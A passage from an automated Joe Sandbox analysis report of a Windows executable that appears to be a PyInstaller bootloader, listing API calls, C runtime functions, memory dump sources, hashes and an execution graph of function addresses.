                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorLast_free
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2283115069-0
                                                                                                                      • Opcode ID: c6a07b6bf22a65b253cad5691fbdbe7150554be9579b9deafa7ae28fb5c45217
                                                                                                                      • Instruction ID: ad61a686e0009904b778177c8fe733baf8bba1387840896059b781d75bd600b9
                                                                                                                      • Opcode Fuzzy Hash: c6a07b6bf22a65b253cad5691fbdbe7150554be9579b9deafa7ae28fb5c45217
                                                                                                                      • Instruction Fuzzy Hash: F711A5326046147AD7117AB5AC87E7B3659DBC1774B240334F528D33E1DEB58C457311
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F5F2C8,00000000,?,00F67FB9,00000000,00000000,00F5F2C8,?,?,00000000,00000000,00000001), ref: 00F5F1E2
                                                                                                                      • GetLastError.KERNEL32(?,00F67FB9,00000000,00000000,00F5F2C8,?,?,00000000,00000000,00000001,00000000,00000000,?,00F5F2C8,00000000,00000104), ref: 00F5F1EC
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F5F1F3
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2398240785-0
                                                                                                                      • Opcode ID: b2929e8e3de4c27899dfb58b33ef189809aac49330ff89cc93e7d278efb7e2b0
                                                                                                                      • Instruction ID: ac1cbd61f767423f856330e0a65cf455ee27284160f5922c561c3f7546230a5b
                                                                                                                      • Opcode Fuzzy Hash: b2929e8e3de4c27899dfb58b33ef189809aac49330ff89cc93e7d278efb7e2b0
                                                                                                                      • Instruction Fuzzy Hash: E9F06D36A00115BBCB202FA2DC08D5AFF69EF457B270445A1FA19C6420D731E969FBD0
                                                                                                                      APIs
                                                                                                                      • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,00F5F2C8,00000000,?,00F6802E,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00F5F179
                                                                                                                      • GetLastError.KERNEL32(?,00F6802E,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00F5F2C8,00000000,00000104,?), ref: 00F5F183
                                                                                                                      • __dosmaperr.LIBCMT ref: 00F5F18A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2398240785-0
                                                                                                                      • Opcode ID: d9a54613b5a475e994f8ec2bc3b85c782482a97b510cc08c41ed2cf40d44f248
                                                                                                                      • Instruction ID: 86f8cb9fd64ca095aeac8cc7ba234300bac01f384a57444d162aadc13a297d2a
                                                                                                                      • Opcode Fuzzy Hash: d9a54613b5a475e994f8ec2bc3b85c782482a97b510cc08c41ed2cf40d44f248
                                                                                                                      • Instruction Fuzzy Hash: 88F06932A00915FBCB202BA2DC08D5ABF6AEF443A27154562FA1DC6420D731E968FBD0
                                                                                                                      APIs
                                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000), ref: 00F6F67E
                                                                                                                      • GetLastError.KERNEL32(?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?,00000000,?,00F65711,?), ref: 00F6F68A
                                                                                                                        • Part of subcall function 00F6F650: CloseHandle.KERNEL32(FFFFFFFE,00F6F69A,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?,00000000), ref: 00F6F660
                                                                                                                      • ___initconout.LIBCMT ref: 00F6F69A
                                                                                                                        • Part of subcall function 00F6F612: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00F6F641,00F6B4FB,00000000,?,00F651C5,?,?,00000000,?), ref: 00F6F625
                                                                                                                      • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,00F6B50E,00000000,00000001,00000000,00000000,?,00F651C5,?,?,00000000,?), ref: 00F6F6AF
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2744216297-0
                                                                                                                      • Opcode ID: de70cf53483ed63e81c22757a3f055b67df80735369e5c45ac841450481bd5ff
                                                                                                                      • Instruction ID: 44d623b026365f8bbcac9ade9d576851d5f63ffecef2259d229fc677b74173b4
                                                                                                                      • Opcode Fuzzy Hash: de70cf53483ed63e81c22757a3f055b67df80735369e5c45ac841450481bd5ff
                                                                                                                      • Instruction Fuzzy Hash: EAF03937400128BBCF222F95ED099DA7F66FF197A0B404020FA0C96170CB338964BB91
                                                                                                                      APIs
                                                                                                                      • _free.LIBCMT ref: 00F62DD5
                                                                                                                        • Part of subcall function 00F63B77: RtlFreeHeap.NTDLL(00000000,00000000,?,00F62C8E), ref: 00F63B8D
                                                                                                                        • Part of subcall function 00F63B77: GetLastError.KERNEL32(?,?,00F62C8E), ref: 00F63B9F
                                                                                                                      • _free.LIBCMT ref: 00F62DE8
                                                                                                                      • _free.LIBCMT ref: 00F62DF9
                                                                                                                      • _free.LIBCMT ref: 00F62E0A
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 776569668-0
                                                                                                                      • Opcode ID: 00ab3fef0f48faab1170fbd163fd7754a07a314bb970dfdf4ea34aaeb44ff74e
                                                                                                                      • Instruction ID: cbf15a8db23bfed0f43eb8ecd8a3a98e53ff0e54d82640f23c8a9c4b1b90513c
                                                                                                                      • Opcode Fuzzy Hash: 00ab3fef0f48faab1170fbd163fd7754a07a314bb970dfdf4ea34aaeb44ff74e
                                                                                                                      • Instruction Fuzzy Hash: 57E0BF714001689E8711AF25FC028F63B75E7887207514027F414A2232C7B5165DFFD1
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      • Failed to convert Wflag %s using mbstowcs (invalid multibyte string), xrefs: 00F544DA
                                                                                                                      • pyi-, xrefs: 00F5438B
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1552781712.0000000000F51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F50000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1552644504.0000000000F50000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552882128.0000000000F73000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F80000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552907895.0000000000F8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1552984840.0000000000F90000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_f50000_ceFgl3jkkk.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _mbstowcs
                                                                                                                      • String ID: Failed to convert Wflag %s using mbstowcs (invalid multibyte string)$pyi-
                                                                                                                      • API String ID: 686213805-3625900369
                                                                                                                      • Opcode ID: 1eec3864be578206728606b48d12121a23e467f040a6e6459063817da859d417
                                                                                                                      • Instruction ID: fa3554216c446def08ab37fcb0b8a6d9cd0deafa84d4ecbccc4e2728118b1d6d
                                                                                                                      • Opcode Fuzzy Hash: 1eec3864be578206728606b48d12121a23e467f040a6e6459063817da859d417
                                                                                                                      • Instruction Fuzzy Hash: 6341E8B69403006BD754EF64EC47F6637A8AB0031AF440950FF0497293EABDB55CB7A2

                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:5.7%
                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                      Signature Coverage:0%
                                                                                                                      Total number of Nodes:2000
Total number of Limit Nodes: 36
execution_graph: [interactive execution-graph data not reproduced here; each node pairs a function address in the sample (e.g. f5e77b, f5e8cb, f6e4d6) with the Windows API calls observed there, including CreateFileW, GetFileType, PeekNamedPipe, GetFileInformationByHandle, FileTimeToSystemTime, ReadFile, ReadConsoleW, GetEnvironmentStringsW, MultiByteToWideChar, LoadLibraryExW, GetProcAddress, IsDebuggerPresent and GetModuleHandleW, with edges giving caller-to-callee relationships]
21202 f69dd5 GetACP 21200->21202 21203 f69de7 21200->21203 21201->21203 21202->21203 21203->21183 21203->21184 21205 f69d9d 39 API calls 21204->21205 21206 f6a222 21205->21206 21208 f6a25c IsValidCodePage 21206->21208 21212 f6a298 __fread_nolock 21206->21212 21207 f596fa _ValidateLocalCookies 5 API calls 21209 f6a055 21207->21209 21210 f6a26e 21208->21210 21208->21212 21209->21189 21209->21193 21211 f6a29d GetCPInfo 21210->21211 21214 f6a277 __fread_nolock 21210->21214 21211->21212 21211->21214 21212->21207 21223 f69e73 21214->21223 21216 f69c9b ___scrt_is_nonwritable_in_current_image 21215->21216 21301 f68793 EnterCriticalSection 21216->21301 21218 f69ca5 21302 f69cdc 21218->21302 21224 f69e9b GetCPInfo 21223->21224 21225 f69f64 21223->21225 21224->21225 21231 f69eb3 21224->21231 21226 f596fa _ValidateLocalCookies 5 API calls 21225->21226 21228 f69ff1 21226->21228 21228->21212 21234 f6a7d9 21231->21234 21235 f5c80e _mbstowcs 37 API calls 21234->21235 21236 f6a7f9 21235->21236 21237 f67937 _mbstowcs MultiByteToWideChar 21236->21237 21239 f6a826 21237->21239 21238 f6a8b7 21240 f596fa _ValidateLocalCookies 5 API calls 21238->21240 21239->21238 21241 f65ba2 __fread_nolock 15 API calls 21239->21241 21245 f6a84c __fread_nolock 21239->21245 21242 f69f1b 21240->21242 21241->21245 21249 f6f3fa 21242->21249 21243 f6a8b1 21254 f6a8dc 21243->21254 21245->21243 21246 f67937 _mbstowcs MultiByteToWideChar 21245->21246 21247 f6a89a 21246->21247 21247->21243 21248 f6a8a1 GetStringTypeW 21247->21248 21248->21243 21250 f5c80e _mbstowcs 37 API calls 21249->21250 21251 f6f40d 21250->21251 21258 f6f210 21251->21258 21255 f6a8f9 21254->21255 21256 f6a8e8 21254->21256 21255->21238 21256->21255 21257 f63b77 _free 14 API calls 21256->21257 21257->21255 21259 f6f22b 21258->21259 21301->21218 21303 f5b9d8 __fread_nolock 25 API calls 21302->21303 21304 f69cfe 21303->21304 21305 f5b9d8 __fread_nolock 25 API calls 21304->21305 21306 f69d1d 21305->21306 21307 f63b77 _free 14 API calls 
21306->21307 21308 f69cb2 21306->21308 21307->21308 21309 f69cd0 21308->21309 21312 f687db LeaveCriticalSection 21309->21312 21311 f69cbe 21311->21196 21312->21311 22017 f67a2f 22018 f67bd2 22017->22018 22021 f67a59 22017->22021 22019 f5e619 __dosmaperr 14 API calls 22018->22019 22020 f67bbd 22019->22020 22022 f596fa _ValidateLocalCookies 5 API calls 22020->22022 22021->22018 22024 f67aa4 22021->22024 22023 f67bef 22022->22023 22038 f6dbb4 22024->22038 22028 f67ad8 22029 f67bf1 22028->22029 22053 f6d299 22028->22053 22031 f63b43 __wsopen_s 11 API calls 22029->22031 22033 f67bfd 22031->22033 22032 f67aea 22032->22029 22060 f6d2c5 22032->22060 22035 f67afc 22035->22029 22036 f67b05 22035->22036 22036->22020 22067 f6dc11 22036->22067 22039 f6dbc0 ___scrt_is_nonwritable_in_current_image 22038->22039 22040 f67ac4 22039->22040 22075 f68793 EnterCriticalSection 22039->22075 22046 f6d26d 22040->22046 22042 f6dbd1 22043 f6dbe5 22042->22043 22076 f6da8d 22042->22076 22094 f6dc08 22043->22094 22047 f6d28e 22046->22047 22048 f6d279 22046->22048 22047->22028 22049 f5e619 __dosmaperr 14 API calls 22048->22049 22050 f6d27e 22049->22050 22051 f63b33 _mbstowcs 25 API calls 22050->22051 22052 f6d289 22051->22052 22052->22028 22054 f6d2a5 22053->22054 22055 f6d2ba 22053->22055 22056 f5e619 __dosmaperr 14 API calls 22054->22056 22055->22032 22057 f6d2aa 22056->22057 22058 f63b33 _mbstowcs 25 API calls 22057->22058 22059 f6d2b5 22058->22059 22059->22032 22061 f6d2e6 22060->22061 22062 f6d2d1 22060->22062 22061->22035 22063 f5e619 __dosmaperr 14 API calls 22062->22063 22064 f6d2d6 22063->22064 22065 f63b33 _mbstowcs 25 API calls 22064->22065 22066 f6d2e1 22065->22066 22066->22035 22068 f6dc1d ___scrt_is_nonwritable_in_current_image 22067->22068 22319 f68793 EnterCriticalSection 22068->22319 22070 f6dc28 22320 f6d2f1 22070->22320 22075->22042 22077 f6dad9 22076->22077 22078 f65ba2 __fread_nolock 15 API calls 22077->22078 22093 f6dae0 22077->22093 22086 f6daff 22078->22086 22079 f6db57 
22160 f6d933 22079->22160 22081 f6db4e 22097 f6d692 22081->22097 22083 f6db54 22085 f63b77 _free 14 API calls 22083->22085 22084 f6db06 22088 f63b77 _free 14 API calls 22084->22088 22087 f6db62 22085->22087 22086->22084 22089 f6db2e 22086->22089 22090 f596fa _ValidateLocalCookies 5 API calls 22087->22090 22088->22093 22091 f63b77 _free 14 API calls 22089->22091 22092 f6db70 22090->22092 22091->22093 22092->22043 22093->22079 22093->22081 22318 f687db LeaveCriticalSection 22094->22318 22096 f6dc0f 22096->22040 22098 f6d6a2 22097->22098 22099 f6d2c5 25 API calls 22098->22099 22100 f6d6c1 22099->22100 22101 f6d26d 25 API calls 22100->22101 22122 f6d926 22100->22122 22104 f6d6d3 22101->22104 22102 f63b43 __wsopen_s 11 API calls 22103 f6d932 22102->22103 22106 f6d2c5 25 API calls 22103->22106 22105 f65ba2 __fread_nolock 15 API calls 22104->22105 22107 f6d920 22104->22107 22104->22122 22108 f6d73e 22105->22108 22109 f6d960 22106->22109 22107->22083 22112 f63b77 _free 14 API calls 22108->22112 22156 f6d903 22108->22156 22110 f6da82 22109->22110 22113 f6d26d 25 API calls 22109->22113 22114 f63b43 __wsopen_s 11 API calls 22110->22114 22111 f63b77 _free 14 API calls 22111->22107 22115 f6d754 22112->22115 22116 f6d972 22113->22116 22121 f6da8c 22114->22121 22117 f68911 25 API calls 22115->22117 22116->22110 22118 f6d299 25 API calls 22116->22118 22119 f6d782 22117->22119 22120 f6d984 22118->22120 22119->22122 22136 f6d78d __fread_nolock 22119->22136 22120->22110 22123 f6d98d 22120->22123 22125 f65ba2 __fread_nolock 15 API calls 22121->22125 22140 f6dae0 22121->22140 22122->22102 22124 f63b77 _free 14 API calls 22123->22124 22126 f6d998 GetTimeZoneInformation 22124->22126 22134 f6daff 22125->22134 22143 f6da5c 22126->22143 22145 f6d9b4 __fread_nolock 22126->22145 22127 f6db57 22128 f6d933 42 API calls 22127->22128 22131 f6db54 22128->22131 22129 f6db4e 22130 f6d692 42 API calls 22129->22130 22130->22131 22133 f63b77 _free 14 API calls 22131->22133 22132 f6db06 22137 f63b77 
_free 14 API calls 22132->22137 22135 f6db62 22133->22135 22134->22132 22138 f6db2e 22134->22138 22139 f596fa _ValidateLocalCookies 5 API calls 22135->22139 22197 f6d64b 22136->22197 22137->22140 22141 f63b77 _free 14 API calls 22138->22141 22142 f6db70 22139->22142 22140->22127 22140->22129 22141->22140 22142->22083 22143->22083 22273 f6a531 22145->22273 22146 f6d7d8 22269 f65c35 22146->22269 22151 f6da48 22153 f6db72 42 API calls 22151->22153 22153->22143 22154 f6d89e 22154->22156 22157 f6d64b 42 API calls 22154->22157 22155 f65c35 38 API calls 22158 f6d849 22155->22158 22156->22111 22157->22156 22158->22154 22159 f65c35 38 API calls 22158->22159 22159->22154 22161 f6d943 22160->22161 22162 f6d2c5 25 API calls 22161->22162 22163 f6d960 22162->22163 22164 f6da82 22163->22164 22165 f6d26d 25 API calls 22163->22165 22166 f63b43 __wsopen_s 11 API calls 22164->22166 22167 f6d972 22165->22167 22170 f6da8c 22166->22170 22167->22164 22168 f6d299 25 API calls 22167->22168 22169 f6d984 22168->22169 22169->22164 22171 f6d98d 22169->22171 22173 f65ba2 __fread_nolock 15 API calls 22170->22173 22191 f6dae0 22170->22191 22172 f63b77 _free 14 API calls 22171->22172 22174 f6d998 GetTimeZoneInformation 22172->22174 22183 f6daff 22173->22183 22181 f6da5c 22174->22181 22186 f6d9b4 __fread_nolock 22174->22186 22175 f6db57 22176 f6d933 42 API calls 22175->22176 22179 f6db54 22176->22179 22177 f6db4e 22178 f6d692 42 API calls 22177->22178 22178->22179 22182 f63b77 _free 14 API calls 22179->22182 22180 f6db06 22185 f63b77 _free 14 API calls 22180->22185 22181->22083 22184 f6db62 22182->22184 22183->22180 22187 f6db2e 22183->22187 22188 f596fa _ValidateLocalCookies 5 API calls 22184->22188 22185->22191 22192 f6a531 37 API calls 22186->22192 22189 f63b77 _free 14 API calls 22187->22189 22190 f6db70 22188->22190 22189->22191 22190->22083 22191->22175 22191->22177 22193 f6da37 22192->22193 22194 f6db72 42 API calls 22193->22194 22195 f6da48 22194->22195 22196 f6db72 42 API calls 
22195->22196 22196->22181 22198 f69768 25 API calls 22197->22198 22199 f6d660 22198->22199 22200 f6d667 22199->22200 22201 f6d685 22199->22201 22202 f5eb8a 37 API calls 22200->22202 22203 f63b43 __wsopen_s 11 API calls 22201->22203 22204 f6d67a 22202->22204 22207 f6d691 22203->22207 22205 f680d7 __wsopen_s WideCharToMultiByte 22204->22205 22206 f6d680 22205->22206 22206->22146 22208 f6d2c5 25 API calls 22207->22208 22209 f6d6c1 22208->22209 22210 f6d926 22209->22210 22211 f6d26d 25 API calls 22209->22211 22212 f63b43 __wsopen_s 11 API calls 22210->22212 22214 f6d6d3 22211->22214 22213 f6d932 22212->22213 22216 f6d2c5 25 API calls 22213->22216 22214->22210 22215 f65ba2 __fread_nolock 15 API calls 22214->22215 22217 f6d920 22214->22217 22218 f6d73e 22215->22218 22219 f6d960 22216->22219 22217->22146 22222 f63b77 _free 14 API calls 22218->22222 22267 f6d903 22218->22267 22220 f6da82 22219->22220 22223 f6d26d 25 API calls 22219->22223 22224 f63b43 __wsopen_s 11 API calls 22220->22224 22221 f63b77 _free 14 API calls 22221->22217 22225 f6d754 22222->22225 22226 f6d972 22223->22226 22227 f6da8c 22224->22227 22228 f68911 25 API calls 22225->22228 22226->22220 22229 f6d299 25 API calls 22226->22229 22234 f65ba2 __fread_nolock 15 API calls 22227->22234 22249 f6dae0 22227->22249 22230 f6d782 22228->22230 22231 f6d984 22229->22231 22230->22210 22245 f6d78d __fread_nolock 22230->22245 22231->22220 22232 f6d98d 22231->22232 22243 f6daff 22234->22243 22236 f6db57 22238 f6db4e 22253 f6d64b 42 API calls 22245->22253 22249->22236 22249->22238 22267->22221 22270 f65c50 22269->22270 22293 f6329a 22270->22293 22274 f66254 _mbstowcs 37 API calls 22273->22274 22275 f6a53c 22274->22275 22276 f664a6 _mbstowcs 37 API calls 22275->22276 22277 f6a54c 22276->22277 22278 f6db72 22277->22278 22279 f69768 25 API calls 22278->22279 22280 f6db86 22279->22280 22281 f6dba7 22280->22281 22282 f6db8d 22280->22282 22284 f63b43 __wsopen_s 11 API calls 22281->22284 22283 f680d7 __wsopen_s 
WideCharToMultiByte 22282->22283 22285 f6dba2 22283->22285 22286 f6dbb3 ___scrt_is_nonwritable_in_current_image 22284->22286 22285->22151 22287 f6dbf8 22286->22287 22317 f68793 EnterCriticalSection 22286->22317 22287->22151 22289 f6dbd1 22290 f6dbe5 22289->22290 22291 f6da8d 43 API calls 22289->22291 22291->22290 22294 f5e044 25 API calls 22293->22294 22297 f632af 22294->22297 22295 f632e8 22298 f5c80e _mbstowcs 37 API calls 22295->22298 22296 f632c4 22299 f5e619 __dosmaperr 14 API calls 22296->22299 22297->22295 22297->22296 22310 f632d4 22297->22310 22303 f632f7 22298->22303 22300 f632c9 22299->22300 22302 f63b33 _mbstowcs 25 API calls 22300->22302 22301 f61b3f GetStringTypeW 22301->22303 22302->22310 22303->22301 22305 f63321 22303->22305 22310->22154 22310->22155 22317->22289 22318->22096 22319->22070 22321 f6d26d 25 API calls 22320->22321 22322 f6d309 22321->22322 22323 f6d312 22322->22323 22324 f6d500 22322->22324 22327 f6d342 22323->22327 22328 f6d43c 22323->22328 22333 f6d437 22323->22333 22325 f63b43 __wsopen_s 11 API calls 22324->22325 22326 f6d50a 22325->22326 22339 f6d50b 22327->22339 22329 f6d50b 25 API calls 22328->22329 22330 f6d462 22329->22330 22331 f6d50b 25 API calls 22330->22331 22331->22333 22336 f6dc5c 22333->22336 22335 f6d50b 25 API calls 22335->22333 22346 f687db LeaveCriticalSection 22336->22346 22338 f6dc47 22338->22020 22340 f6d522 22339->22340 22341 f6d299 25 API calls 22340->22341 22343 f6d3be 22340->22343 22342 f6d5f8 22341->22342 22342->22343 22344 f63b43 __wsopen_s 11 API calls 22342->22344 22343->22335 22345 f6d64a 22344->22345 22346->22338 21316 f60b95 21317 f60ba1 ___scrt_is_nonwritable_in_current_image 21316->21317 21322 f68793 EnterCriticalSection 21317->21322 21319 f60bb0 21323 f60c10 21319->21323 21322->21319 21326 f687db LeaveCriticalSection 21323->21326 21325 f60c02 21326->21325 16893 f56290 16898 f56990 16893->16898 16895 f5629f LoadLibraryExW 16913 f5e365 16895->16913 16899 f569f6 16898->16899 16900 f5699a 
MultiByteToWideChar 16898->16900 16901 f569fa MultiByteToWideChar 16899->16901 16902 f569b4 16900->16902 16907 f569cb 16900->16907 16903 f56a13 16901->16903 16904 f56a2a 16901->16904 16916 f52290 GetLastError 16902->16916 16908 f52290 51 API calls 16903->16908 16904->16895 16907->16901 16909 f569df 16907->16909 16910 f56a22 16908->16910 16911 f52290 51 API calls 16909->16911 16910->16895 16912 f569ee 16911->16912 16912->16895 16914 f63b77 _free 14 API calls 16913->16914 16915 f562b7 16914->16915 16917 f522d5 16916->16917 16928 f5e312 16917->16928 16921 f522e9 16945 f51a90 16921->16945 16925 f5231b 16926 f596fa _ValidateLocalCookies 5 API calls 16925->16926 16927 f5232e 16926->16927 16927->16895 16961 f5bfb2 16928->16961 16931 f565b0 16932 f565ba __wsopen_s 16931->16932 16933 f565d3 GetLastError 16932->16933 16934 f565d9 FormatMessageW 16932->16934 16933->16934 16935 f565fc 16934->16935 16936 f56628 16934->16936 16937 f52290 51 API calls 16935->16937 17574 f56a30 16936->17574 16939 f5660b 16937->16939 16941 f596fa _ValidateLocalCookies 5 API calls 16939->16941 16940 f5663c 16942 f596fa _ValidateLocalCookies 5 API calls 16940->16942 16943 f56621 16941->16943 16944 f5665e 16942->16944 16943->16921 16944->16921 16946 f51aa8 16945->16946 16947 f5e312 44 API calls 16946->16947 16948 f51ab6 16947->16948 16949 f52420 16948->16949 16950 f5242a __fread_nolock __wsopen_s 16949->16950 16951 f56990 51 API calls 16950->16951 16952 f5246c 16951->16952 16953 f52473 16952->16953 16954 f524b9 MessageBoxA 16952->16954 16956 f56990 51 API calls 16953->16956 16955 f596fa _ValidateLocalCookies 5 API calls 16954->16955 16957 f524da 16955->16957 16958 f52483 MessageBoxW 16956->16958 16957->16925 16959 f596fa _ValidateLocalCookies 5 API calls 16958->16959 16960 f524b2 16959->16960 16960->16925 16962 f5bff2 16961->16962 16963 f5bfda 16961->16963 16962->16963 16965 f5bffa 16962->16965 16964 f5e619 __dosmaperr 14 API calls 16963->16964 16966 f5bfdf 16964->16966 16976 f5c80e 16965->16976 16968 
f63b33 _mbstowcs 25 API calls 16966->16968 16974 f5bfea 16968->16974 16969 f596fa _ValidateLocalCookies 5 API calls 16971 f522e3 16969->16971 16970 f5c00a 16984 f5cb0f 16970->16984 16971->16931 16974->16969 16977 f5c82e 16976->16977 16983 f5c825 16976->16983 16977->16983 17000 f66254 GetLastError 16977->17000 16983->16970 17207 f5e044 16984->17207 16986 f5c091 16997 f5c891 16986->16997 16987 f5cb2f 16988 f5e619 __dosmaperr 14 API calls 16987->16988 16989 f5cb34 16988->16989 16990 f63b33 _mbstowcs 25 API calls 16989->16990 16990->16986 16991 f5cb20 16991->16986 16991->16987 17214 f5cdb9 16991->17214 17222 f5d642 16991->17222 17227 f5cea0 16991->17227 17232 f5ceed 16991->17232 17261 f5d1b3 16991->17261 16998 f63b77 _free 14 API calls 16997->16998 16999 f5c8a1 16998->16999 16999->16974 17001 f6626b 17000->17001 17004 f66271 17000->17004 17035 f6736d 17001->17035 17024 f66277 SetLastError 17004->17024 17040 f673ac 17004->17040 17006 f67024 __dosmaperr 14 API calls 17008 f6629f 17006->17008 17011 f662a7 17008->17011 17012 f662be 17008->17012 17009 f5c84e 17027 f664a6 17009->17027 17010 f6630b 17050 f63002 17010->17050 17015 f673ac __dosmaperr 6 API calls 17011->17015 17014 f673ac __dosmaperr 6 API calls 17012->17014 17018 f662ca 17014->17018 17016 f662b5 17015->17016 17021 f63b77 _free 14 API calls 17016->17021 17019 f662ce 17018->17019 17020 f662df 17018->17020 17022 f673ac __dosmaperr 6 API calls 17019->17022 17045 f66082 17020->17045 17021->17024 17022->17016 17024->17009 17024->17010 17028 f5c864 17027->17028 17029 f664b9 17027->17029 17031 f664d3 17028->17031 17029->17028 17164 f6abc5 17029->17164 17032 f664e6 17031->17032 17033 f664fb 17031->17033 17032->17033 17186 f6a1ef 17032->17186 17033->16983 17036 f671b0 __dosmaperr 5 API calls 17035->17036 17037 f67389 17036->17037 17038 f673a4 TlsGetValue 17037->17038 17039 f67392 17037->17039 17039->17004 17041 f671b0 __dosmaperr 5 API calls 17040->17041 17042 f673c8 17041->17042 17043 f673e6 TlsSetValue 17042->17043 
